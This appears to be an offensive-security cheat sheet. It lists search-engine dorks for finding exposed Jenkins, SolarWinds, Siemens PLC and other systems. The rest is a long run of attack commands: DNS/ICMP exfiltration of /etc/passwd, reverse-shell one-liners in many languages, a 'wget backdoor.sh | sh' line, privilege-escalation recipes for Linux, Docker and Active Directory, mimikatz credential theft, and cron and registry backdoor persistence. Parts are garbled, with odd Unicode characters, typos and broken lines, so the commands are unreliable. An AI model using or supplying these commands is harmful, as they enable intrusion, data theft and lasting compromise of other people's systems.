port: 80, 443 && http.get.body:”Redmine” OR http.get.body:”Redmine - Error”

http.html:”Redmine” OR http.html:”Redmine - Error”

title:”Redmine”

title:”Redmine”

title:”Redmine”

http.html:”Redmine” OR http.html:”Redmine - Error”

product:Redmine

DokuWiki

http.component:dokuwiki

443.https.get.metadata.server: DokuWiki

http.html: dokuwiki

http.server.metadata.product: dokuwiki

http.component:dokuwiki

app:”DokuWiki”

http.favicon.hash: 682090857 AND http.html: β€œdokuwiki”

title=”DokuWiki” || header=”DokuWiki”

product: DokuWiki

title:”dokuwiki” || body:”dokuwiki” || pageHash:”dokuwiki”

Jenkins

β€œServer: Jetty” β€œX-Jenkins”

β€œJenkins” AND β€œ200 OK”

β€œjenkins” OR β€œjenkins-ci”

β€œtags.jenkins” OR β€œhttp.component:jenkins”

β€œtitle:Jenkins” OR β€œbody:Jenkins”

app:Jenkins

service.name:jenkins

body.includes=Jenkins” OR β€œtitle.includes=Jenkins

β€œhttp.favicon.hash:118356961” OR β€œhttp.headers.server:Jetty(.*)(Jenkins|jenkins)”

β€œintext:Jenkins intitle:Dashboard” OR β€œinurl:jenkins intitle:login”

Bamboo

β€œBamboo” port:8085

(443.https.tls.certificate.parsed.names: β€œbamboo” AND 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: β€œbamboo”) OR 8085.banner: β€œAtlassian Bamboo”

http.useragent:”Atlassian HttpClient” http.uri.path:”/bamboo/”

http.server.headers.product: β€œAtlassian-Bamboo”

app:”BambooHR”

http.title:”BambooHR” OR http.title:”Bamboo Login”

title=”BambooHR” OR β€œAtlassian Bamboo”

title:”BambooHR” OR title:”Atlassian Bamboo”

β€œhttps://bamboohr.com/” OR β€œhttps://.bamboohr.com/” OR β€œhttps://.atlassian.net/bamboo”

D-Link

Server: DWS-3024/DWS-4026

443.https.get.body_sha256: 6db3cb97f7c6b921e6d8f17db874de6c54df6a4d4d8b4caad7724063907c0522

text:D-Link

dlink

title:’D-Link’

webapp=’D-Link’

product: dlink

title=”D-Link” || body=”D-Link”

http.favicon.hash:1572591353

product:D-Link

TPLink

Server: TP-LINK

443.https.get.body: β€œTP-LINK”

http.html: /tplinklogin.net/

http.user_agent: β€œTP-LINK” or http.html: β€œtplinklogin.net”

http.component: β€œTPLINK”

app:”TP-LINK ROUTER”

http.html: /tplinklogin.net/ or http.html: /tplogin.cn/

title=”TP-LINK” || header=”TP-LINK”

HTTP Headers.server: TP-LINK

title:”TP-LINK”

HP iLO

HP-iLO-Server at / inurl:login.htm

hp ilo” OR β€œhp integrated lights-out

β€œHP-iLO-Server” OR β€œHP-iLO-4-Server” OR β€œHP-iLO-5-Server”

title:”Integrated Lights-Out” hp” OR β€œHP Integrated Lights-Out http-title:”

title:”Integrated Lights-Out” hp” OR β€œHP Integrated Lights-Out http-title:”

app:”HP Integrated Lights-Out”” OR β€œapp:”iLO”

title:”Integrated Lights-Out” hp” OR β€œHP Integrated Lights-Out http-title:”

header=”HP-iLO-Server”” OR β€œheader=”HP-iLO-4-Server”” OR β€œheader=”HP-iLO-5-Server”

title:”Integrated Lights-Out” hp” OR β€œHP Integrated Lights-Out http-title:”

product:hp integrated lights-out” OR β€œtitle:”Integrated Lights-Out” hp

Adobe Connect

product:Adobe Connect

443.https.get.metadata.server: AdobeConnect

server.headers.server: AdobeConnect

http.html_body: adobeconnect.com

product:Adobe Connect

title: Adobe Connect

443.metadata.server: AdobeConnect

title=Adobe Connect

Adobe Connect

adobeconnect.com

Netgear

netgear

netgear

netgear

netgear

netgear

netgear

netgear

title=NETGEAR

product:NETGEAR

netgear

Nexus

β€œnexus” http.favicon.hash:1319622454

443.https.get.headers.server: Nexus/*

server:Nexus

http.html.headers.server: Nexus/*

product:nexus

webapp=”Sonatype Nexus Repository Manager”

nexus

title=”Sonatype Nexus Repository Manager” || body=”Nexus Repository Manager” || body=”Nexus Repository”

Nexus

product:Nexus Repository

SaltStack

product:”SaltStack” port:”4505,4506”

443.https.get.body_sha256:7c1dd60d42f7a496d16f584e7a0c2d1a7f904c4b4f54c4bb2cbff1ad78c520cb

app:SaltStack

metadata.product:”SaltStack”

protocols:”smb” AND service.service_name:”smb” AND smb.banner:”SaltStack”

app:”SaltStack”

service.name:salt

app=”SaltStack”

https.html.body:”SaltStack”

app:”SaltStack”

Graylog

β€œtitle:Graylog” OR β€œh1:Graylog”

β€œtitle:Graylog” OR β€œh1:Graylog”

β€œtitle:Graylog” OR β€œh1:Graylog”

β€œtitle:Graylog” OR β€œh1:Graylog”

Graylog

title:Graylog

title:Graylog

title:Graylog

title:Graylog

title:Graylog

Bugzilla

β€œBugzilla_login” port:”80, 443”

product:Bugzilla

http.favicon.hash:-431232002

port:80 http.favicon.hash:-431232002

title:”Bugzilla”

title:”Bugzilla”

app:bugzilla

title=Bugzilla

https:///bugzilla/

intext:”Bugzilla_login”

Siemens PLCs

β€œSiemens PLC” port:102, β€œSiemens PLC” port:502, β€œSiemens PLC” port:161, β€œSiemens PLC” port:2000, β€œSiemens PLC” port:102/tcp, β€œSiemens PLC” port:102/udp, β€œSiemens PLC” port:502/tcp, β€œSiemens PLC” port:161/tcp, β€œSiemens PLC” port:2000/tcp

(β€œSiemens” AND β€œplc”) AND protocols: β€œmodbus”, β€œs7”, β€œbacnet”

β€œSiemens” β€œPLC” site:*.com

β€œSiemens PLC” OR β€œS7 PLC”

β€œSiemens PLC” OR β€œSiemens Simatic” OR β€œSiemens S7”

β€œSiemens” β€œPLC”

β€œSiemens” β€œPLC”

title=”Siemens” && title=”PLC”

Siemens PLC”

Siemens PLC”

SolarWinds

β€œSolarWinds” port: 443, 80, 8443, 17778

p443.http.get.title: β€œSolarWinds”

solarwinds

metadata.product: β€œsolarwinds”

http.component:SolarWinds

app:”SolarWinds”

solarwinds

title=”SolarWinds” || header=”solarwinds”

solarwinds

solarwinds

Joomla

β€œjoomla” port:80,443,8080

(80.http.get.title:”Joomla!” OR 443.https.get.title:”Joomla!” OR 8080.http.get.title:”Joomla!”) AND protocols:(β€œ80/http” OR β€œ443/https” OR β€œ8080/http”)

http.title:”Joomla!” OR https.title:”Joomla!”

http.html_title:”Joomla!” OR https.html_title:”Joomla!”

β€œJoomla” protocol:https

β€œjoomla” port:”80, 443, 8080”

title:”Joomla!”

title=”Joomla!” || header=”Joomla!” || body=”Joomla!” || banner=”Joomla!”

β€œJoomla” && http

app:”Joomla” AND (protocols:80 OR protocols:443 OR protocols:8080)

WordPress

http.component:”wordpress” -http.title:”404” -http.title:”Not Found”

443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: wordpress

http.html.body:wordpress

http.html.body:/wp-content/

http.component:”WordPress”

app:”WordPress”

http.component==”WordPress”

title=”WordPress” && protocol=”https”

http.favicon.hash: -1412814735

Drupal

http.favicon.hash:-335242539 drupal

443.https.get.body_sha256:*,27a1f1d7df1e0c9f89d0b35c2466e2bbbd8c6ca0ed6b62100d1f98f1c9cfbde7 drupal

http.html_hash:563737271 drupal

metadata.product:drupal

protocols:80.http.get.headers.server:Drupal

app:”Drupal CMS”

HTTP.favicon.hash:-335242539 Drupal

title=”Powered by Drupal” || body=”This site is powered by Drupal” || header=”X-Generator: Drupal”

product:drupal

drupal

Laravel

β€œlaravel” http.component:/laravel/

p.server software:”nginx/1.16.1” && p.http.server_header:”Laravel”

http.html:/”Laravel Framework”/

http.metadata.product:Laravel

http.component:laravel

app:”Laravel Framework”

http.favicon.hash:-318056997

app=”laravel”

http.title:”Laravel”

http.html:/”Laravel Framework”/

Zend Framework

β€œServer: ZendServer” OR β€œSet-Cookie: ZDEDebuggerPresent”

p.http.components.name: β€œZend Framework”

p:http.component:zend

http.component:zend-framework

http.fingerprint.service: β€œZend Server” OR http.html.xpath: β€œ//*[contains(text(),’Zend Framework’)]”

β€œPHPSESSID” β€œZend Framework”

http.fingerprint.component:Zend

title=”Zend Framework”

http.html.body: β€œZend Framework”

Symfony

β€œServer: Symfony” OR β€œX-Symfony-Version”

443.https.get.title: β€œWelcome to Symfony””, β€œ80.http.get.title: β€œWelcome to Symfony””, or β€œ80.http.get.body: β€œPowered by Symfony”

http.html_body:Symfony

http.server_header:Symfony

http.favicon.hash:3964474325

app:Symfony

Symfony

title=”Welcome to Symfony” || header=”X-Symfony-Version”

Symfony

Symfony

Node.js Express

http.favicon.hash:-335242539 β€˜set-cookie: connect.sid’ β€˜X-Powered-By: Express’

443.https.get.body_sha256:5npHOpkBQmXv+7M1fYOtFkx7fW8IvSbzzNNQoWXq3G4 AND 443.https.tls.certificate.parsed.subject.common_name:*.nodejitsu.com

http.headers.server:Express AND http.html.body:express

http.favicon.hash:-335242539 AND http.headers.server:Express

http.favicon.hash:-335242539 AND http.headers.server:Express

app: β€œnode.js express”

Roundcube

β€œroundcube” http.component:”roundcube”

(443.https.tls.certificate.parsed.names: β€œwebmail.yourdomain.com”) AND protocols: [β€œ443/https”] (25.smtp.starttls.tls.certificate.parsed.names: β€œwebmail.yourdomain.com”) AND protocols: [β€œ25/smtp”]

http.html_body: β€œRoundcube Webmail”

web.server: β€œroundcube”

roundcube

app:”roundcube”

roundcube

title=”Roundcube Webmail”

Roundcube

http.favicon.hash: β€œ3261056547”

Zimbra

β€œzimbra” port:7071, β€œzimbra” port:8443

80.http.get.title:”Zimbra Web Client” OR 80.http.get.title:”Zimbra Login” OR 443.https.get.title:”Zimbra Web Client” OR 443.https.get.title:”Zimbra Login”

html.title:”Zimbra”

zimbra

product:”Zimbra Collaboration Server”

zimbra

zimbra

title=”Zimbra Web Client” || title=”Zimbra Login” || body=”Zimbra Collaboration Server” || header=”zimbra” || header=”Zimbra”

zimbra

zimbra

Manage Engine ServiceDesk

Server: ManageEngine_ServiceDesk

443.https.tls.certificate.parsed.subject.organization:ManageEngine

domain:’servicedesk.*.manageengine.com’

http.favicon.hash:-1360563422

title:’ManageEngine ServiceDesk Plus’

title:’ManageEngine ServiceDesk Plus - Login’

http.html: /ManageEngine/ServiceDeskPlus/

title=”ManageEngine ServiceDesk Plus” || body=”Powered by ServiceDesk Plus” || body=”ManageEngine ServiceDesk Plus” || header=”Server: ManageEngine_ServiceDesk”

title:’ServiceDesk Plus - Log in’

http.title:’ServiceDesk Plus - Log in’ OR body:’ServiceDesk Plus - Log in’ OR http.title:’ServiceDesk Plus - Self Service’ OR body:’ServiceDesk Plus - Self Service’

Delta Electronics InfraSuite

β€œhttp.component:InfiniManage” β€œInfraSuite Device” β€œDelta Electronics” censys: 443.https.get.headers.server: InfiniManage AND 443.https.tls.certificate.parsed.subject.organization:Delta Electronics Inc

html.body:InfiniManage AND html.title:InfraSuite Device AND html.body:Delta Electronics

html.body:InfiniManage AND html.title:InfraSuite Device AND html.body:Delta Electronics

tag:”infinimanage” AND tag:”device” AND tag:”infrasuite” AND tag:”delta electronics”

html.title:”InfiniManage” AND html.body:”InfraSuite Device” AND html.body:”Delta Electronics”

app:”InfiniManage” AND title:”InfraSuite Device” AND body:”Delta Electronics”

title:”InfraSuite Device” AND body:”Delta Electronics” AND app:”InfiniManage”

title=”InfiniManage” && body=”InfraSuite Device” && body=”Delta Electronics”

title:InfiniManage AND body:InfraSuite Device AND body:”Delta Electronics”

β€œInfiniManage” AND β€œInfraSuite Device” AND β€œDelta Electronics”

PandoraFMS

http.favicon.hash:-335242539 port:80 pandorafms

443.https.tls.certificate.parsed.subject.common_name: pandorafms

pandorafms

port:80 http.component:pandoraFMS

http.favicon.hash:-335242539 pandorafms

title:”Pandora FMS - Login”

pandorafms

title=”Pandora FMS” || body=”Powered by Pandora FMS”

https://app.pandorafms.com/

app:pandorafms

Lexmark printers

β€œlexmark” β€œHTTP/1.1 200 OK” β€œServer: Lexmark”

β€œlexmark” and 443.https.get.headers.server: Lexmark

metadata.product:lexmark

http.title:”Lexmark”

app:”Lexmark-HttpServer”

service:lexmark

title=”Lexmark”

lexmark

lexmark

Browser Cache

Firefox

𝑐𝑑 /. π‘šπ‘œπ‘§π‘–π‘™π‘™π‘Ž/π‘“π‘–π‘Ÿπ‘’π‘“π‘œπ‘₯/4π‘π‘§π‘”π‘žπ‘”π‘—4. π‘‘π‘’π‘“π‘Žπ‘’π‘™π‘‘ βˆ’ π‘Ÿπ‘’π‘™π‘’π‘Žπ‘ e
π‘ π‘žπ‘™π‘–π‘‘π‘’3 π‘π‘™π‘Žπ‘π‘’π‘ . π‘ π‘žπ‘™π‘–π‘‘π‘’
.π‘‘π‘Žπ‘π‘™π‘’π‘ 
𝑠𝑒𝑙𝑒𝑐𝑑 π‘šπ‘œπ‘§_π‘π‘™π‘Žπ‘π‘’π‘ . π‘’π‘Ÿπ‘™ π‘“π‘Ÿπ‘œπ‘š π‘šπ‘œπ‘§_π‘π‘™π‘Žπ‘π‘’π‘ ;
. π‘žπ‘’π‘–

File transfer

Transfer by ftp without direct access to shell

echo open ip 21 ftp.txt
echo user ftp.txt
echo pass ftp.txt
echo bin ftp.txt
echo GET file tp.txt
echo bye ftp.txt
ftp -s:ftp.txt

Transfer Dns in Linux

On victim:
1. Hex encode the file to be transferred
    xxd -p secret file.hex
2. Read in each line and do a DNS lookup
    forb in 'cat fole.hex'; do dig $b.shell.evilexample.com; done

Attacker:
1. Capture DNS exfil packets
    tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
    tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d'
    cut -f1 -d'.' | uniq received. txt
3. Reverse the hex encoding
    xxd -r -p received~.txt kefS.pgp

Execute the exfil command and transfer its information with icmp

On victim (never ending 1 liner):
     stringz=cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n";
counter=0; while (($counter = ${#stringZ})) ;do ping -s 16 -c l -p
${stringZ:$counter:16} 192.168.10.10 &&
counter=$( (counter+~6)) ; done

On attacker (capture pac~ets to data.dmp and parse):
tcpdump -ntvvSxs 0 'icmp[0]=8' data.dmp
grep Ox0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p

Open mail relay

C:\ telnet x.x.x.x 25
Hello x.x.x.x
MAIL FROM: me@you.com
RCPT TO: YOU@YOU.com
DATA
Thank you.
quit

Reverse loose

Netcat command (* run on the attacker’s system)

nc 10.0.0.1 1234 -e /bin/sh Linux reverse shell
nc 10.0.0.1 1234 -e cmd.exe Windows reverse shell

Netcat command (-e may not be supported in some versions)

nc -e /bin/sh 10.0.0.1 1234

Netcat command for when -e is not supported

rm /tmp/f;mkfifo /tmp/f;cat /tmp/fl/bin/sh -i 2 &line l0.0.0.1 1234 /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.105 9999 >/tmp/f

Perl language

perl -e 'use Socket; $i="10.0.0.l"; $p=1234; socket (S, PF INET, SOCK STREAM,
getprotobjname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN," &S") ;open(STDOUT," &S"); open(STDERR," &S"); exec("/bin/sh" -i");};'

Perl language without /bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new
IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN- fdopen($c,r);$~-fdopen($
c, w) ; system$_ while ;'

Perl language for windows

perl -MIO -e '$c=new IO: :Socket: :INET(PeerAddr,''attackerip:4444'') ;STDIN-fdopen($
c,r) ;$~- fdopen($c,w) ;system$_ while ;'

Python language

python -c 'import socket, subprocess, os; s=socket. socket (socket. AF_INET,
socket.SOCK_STREAM); s.connect( ("10.0.0.1",1234)); os.dup2 (s.fileno() ,0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

Or

check sudoer script content like:

#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
You have new mail in /var/mail/waldo

and create file for got root as shutil.py contains:

import os
import pty
import socket

lhost = "10.10.10.10"
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
   def close(*args):
       return
   def __init__(self, *args):
       return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

and run sudoer script with 

sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6

Bash language

bash -i & /dev/tcp/10.0.0.1/8080 0 &1

Java language

r = Runtime.getRuntime()
p = r.exec( ["/bin/bash","-c","exec 5 /dev/tcp/10.0.0.1/2002;cat &5 |
while read line; do \$line 2 &5 &5; done"] as String[])
p.waitFor()

Php language

php -r '$sock=fsockopen("10.0.0.1", 1234) ;exec("/bin/sh -i &3 &3 2 &3");'

Ruby language

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec
sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

Ruby language without /bin/sh

by -rsocket -e 'exit if
fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd, " r
") {| io|c.print io.read}end'

Ruby language for windows

ruby -rsocket -e
'c=TCPSocket.new("attackerip","4444");while(crnd=c.gets);IO.popen{cmd,"r" ) {|
io|c.print io.read}end'

Telnet command

rm -f /tmp/p; mknod /tmp/p p && telnet attackerrip 4444 0/tmp/p
--OR--
telnet attacker rip 4444 | /bin/bash | telnet attacker rip 4445

Xterm command

xterm -display 10.0.0.1:1
o Start Listener: Xnest: 1
o Add permission to connect: xhost +victimP

Other

wget hhtp:// server /backdoor.sh -O- | sh Downloads and runs backdoor.sh

spawn shell

python3 -c 'import pty; pty.spawn("/bin/sh")'

or

sudo - I
python -c 'import pty; pty. spawn("/bin/bash”)’
sudo -u webadmin vi
ESC +:+ !/bin/sh
bash - i
whoami
try ctrl + z
stty raw -echo 
fg
echo os.system('/bin/bash')
/bin/sh -i
perl β€”e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh

netsec.ws

Improve accessibility

Help: https://gtfobins.github.io/

Increasing accessibility with composer

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Increasing access with docker

You must be logged in with an application that is a member of the docker group.

docker run -v /root:/mnt -it ubuntu

Or

docker run --rm -it --privileged nginx bash
mkdir /mnt/fsroot
mount /dev/sda /mnt/fsroot

Increasing access with docker socket


Checking docker exposure

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

We do the following commands in the script.

cmd="whoami"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds \": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)

revShellContainerID=$(echo "$response" | cut -d'"' -f4)

curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

Then we run it.

./docket-socket-expose.sh

chroot

chroot /root /bin/bash

Increase access with lxd

in attacker host
1. git clone https://github.com/saghul/lxd-alpine-builder.git
2. ./build-alpine
in victim host
3. Download built image
4. import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias attacker
5. lxc init attacker tester -c security.privileged=true
6. lxc exec tester/bin/sh

Increase access with WSUS

SharpWSUS.exe create /payload:"C:\Users\user\Desktop\PsExec64.exe" /args:"-acceptula -s -d cmd.exe /c \"net localgroup administrator user /add\"" /title: title
SharpWSUS.exe approve /updateid:<id> /computername:dc.domain.dev /groupname:"title"

Increase access in journalctl

The journalctl launcher must be run with more privileges such as sudo.

journalctl
!/bin/sh

Or

sudo journalctl
!/bin/sh

Improve access with Splunk Universal Forward Hijacking

python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp /luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

Increase access with 00-header file

echo "id" >> 00-header

Increase accessibility in nano

Ctrl+R + Ctrl+X
reset; sh 1>&0 2>&0

Or

Ctrl+W
/etc/shadow

Increase access in vi

:!/bin/sh

Increase access by ShadowCredentials method

whisker.exe add /target:user
.\Rubeus.exe askgt /user:user /certificate:<base64-cert> /password:"password" /domain:domain /dc:DC.domain.dev /getcredentials /show

Increase access using acl

$user = "megacorp\jorden"
$folder = "C:\Users\administrator"
$acl = get-acl $folder
$aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"
$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
$acl.AddAccessRule($aclrule)
set-acl -path $folder -AclObject $acl
get-acl $folder | folder

Increase access with ldap


To enable ssh using ldap

0. exec ldapmodify -x -w PASSWORD
1. Paste this
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
   DESC 'MANDATORY: OpenSSH Public key'
   EQUALITY octetStringMatch
   SYNTAX 1.3.6.1.4.1.1466.115.121.1.40)
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
   DESC 'MANDATORY: OpenSSH LPK objectclass'
   MAY ( sshPublicKey $ uid )
   )

To improve access to the desired user and user group

2. exec ldapmodify -x -w PASSWORD
3. Paste this
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: content of id_rsa.pub
-
replace: EVIL GROUP ID
uidNumber: CURRENT USER ID
-
replace: EVIL USER ID
gidNumber: CURRENT GROUP ID

Copy from ndts using SeBackupPrivilege permission

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Elevate access with the SeImpersonatePrivilege permission

https://github.com/dievus/printspoofer
printspoofer.exe -i -c "powershell -c whoami"

Read files without authentication with diskshadow

1. priv.txt contain
SET CONTEXT PERSISTENT NEWSWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
2. exec with diskshadow /s priv.txt

Elevate access with the SeLoadDriverPrivilege permission


FIRST:
Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
Download https://github.com/tandasat/ExploitCapcom
change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe

SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
4. in msf exec `run`

Escalation with find

var/lib/jenkins/find . -exec bash -p -i > & /dev/tcp/192.168.2.x/8000 0 > &1 \; - quit

Upgrade access with vds.exe service

. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'

Improve access with ForceChangePassword

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity user1 -verbose
Enter-PSSession -ComputerName COMPUTERNAME -Credential β€œβ€

Improving access with the browser service

. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

Improve access with GenericWrite access

$pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER USER'), $pass)
Set-DomainObject -Credential $creds USER1 -Clear service principalname
Set-DomainObject -Credential $creds -Identity USER1 -SET @{serviceprincipalname='none/fluu'}
.\Rubeus.exe kerberoast /domain:<DOMAIN>

Improve access using Sql service and ActiveSessions

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
. .\Heidi.ps1
Invoke-SQLOCmd -Verbose -Command β€œnet localgroup administrators user1 /add” -Instance COMPUTERNAME

Get golden ticket using mimikatz and scheduled task

1.mimikatz# token::elevate
2.mimikatz# vault::cred /patch
3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH >
5. powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "powershell.exe-c 'iex (iwr http://10.10.10.10/reverse.ps1)'"
7.schtasks /run /s DOMAIN /TN "enterprise"

Upgrade access using the Pass-the-Ticket method

1..\Rubeus.exe askgt /user:<USET>$ /rc4:<NTLM HASH> /ptt
2. klist

Upgrade access with vulnerable GPO

1..\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" -- GPOName "ADDITIONAL DC CONFIGURATION"

Golden Ticket production with mimikatz

1.mimikatz # lsadump::dcsync /user:<USER>
2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT SECURITY ID> /rce:<NTLM HASH> /id:<USER ID>

Upgrade access with TRUSTWORTHY database in SQL Server

1. . .\PowerUpSQL.ps1
2. Get-SQLInstanceLocal -Verbose
3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from master..sysservers').customer.query
4. 
USE "master";
SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE NAME>"
5. powershell -ep bypass
6. Import-Module .\powercat.ps1
7. powercat -l -v -p 443 -t 10000
8.
SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE NAME>" 
execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<DOMAIN>\<DATABASE NAME>" 

gdbus

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true

Permanent access

for Linux (in the attacker’s system)

crontab -e: set for every 10 min
0-59/10 nc ip 777 -e /bin/bash

for Windows (start task scheduler)

sc config schedule start = auto
net start schedule
at 13:30 "C:\nc.exe ip 777 -e cmd.exe""

Running a backdoor along with bypassing the Windows firewall

1. REG add HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run
    /v firewall 7t REG SZ /d "c:\windows\system32\backdoor.exe" /f
2. at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3. SCHTASKS /Create /RU "SYSTEt1" /SC MINUTE /t10 45 /TN FIREWALL /TR
    "%USERPROFILE%\backdoor.exe" /ED 12/12/2012

Payload development in smb or webdav

Via SMB:
1. From the compromised machine, share the payload folder
2. Set sharing to 'Everyone'
3. Use psexec or wmic command to remotely execute payload

Via WebDAV:
1. Launch Metasploit 'webdav file server' module
2. Set the following options:
     localexe = true
     localfile= payload
     localroot= payload directory
     disablePayloadHandler=true
3. Use psexec or wmic command to remotely execute payload
     psexec \\ remote ip /u domain\compromised_user /p password "\\payload
     ip \test\msf.exe"

OR -
wmic /node: remote ip /user:domain\compromised user //password:password
process call create "\\ payload ip \test\msf.exe"

Get lsass process and extract information with mimikatz

procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords f

Extract information in memory using mimikatz plugin in volatility

volatility β€” plugins=/usr/share/volatility/plugins β€” profile=Win7SP0x86 -f halomar.dmp mimikatz

Tunnel

SSH Tunnel

ssh -D 8083 root@192.168.8.3
vi /etc/proxychains.conf ->  socks4 127.0.0.1 8083
proxychains nap -sT 10.1.3.1 -Pn

Fpipe - receiving information from port 1234 and transferring to port 80 2.2.2.2

fpipe.exe -l 1234 -r 80 2.2.2.2

Socks.exe - Intranet scanning in Socks proxy

On redirector (1.1.1.1):
     socks.exe -i1.1.1.1 -p 8C80

Attacker:
Modify /etc/proxjchains.conf:
Comment out: #proxy_dns
Comment out: #socks4a 127.0.0.1 9050
Add line: socks4 1.1.1.1 8080
Scan through socks proxy:
     proxychains nmap -PN -vv -sT -p 22,135,139,445 2.2.2.2

Socat - receiving information from port 1234 and transferring to port 80 2.2.2.2

socat TCP4:LISTEN:1234 TCP4:2.2.2.2:80

Create ssh without ssh service

./socat TCP-LISTEN:22,fork,reuseaddr TCP:172.10.10.11:22

Stunnel - ssl encapsulated in nc tunnel (Windows & Linux) [8]
